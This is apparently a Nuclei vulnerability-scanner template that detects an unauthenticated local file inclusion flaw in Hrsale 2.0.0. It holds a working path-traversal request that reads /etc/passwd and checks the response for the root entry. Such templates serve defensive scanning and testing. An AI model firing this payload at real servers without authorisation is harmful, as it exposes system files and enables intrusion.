id: hrsale-unauthenticated-lfi

info:
  name: Hrsale 2.0.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Hrsale 2.0.0 is vulnerable to local file inclusion. This exploit allow you to download any readable file from server without permission and login session
  reference:
    - https://www.exploit-db.com/exploits/48920
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: hrsale,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/download?type=files&filename=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a00463044022041a030b4b1301965fa50627cff3054acbbe4b767120050f200b582af5afed7a7022003263f721002941e33e99b3f0296b49d9388b6992bb3b3c0a33cb49c6bff8ef9:922c64590222798bb761d5b6d8e72950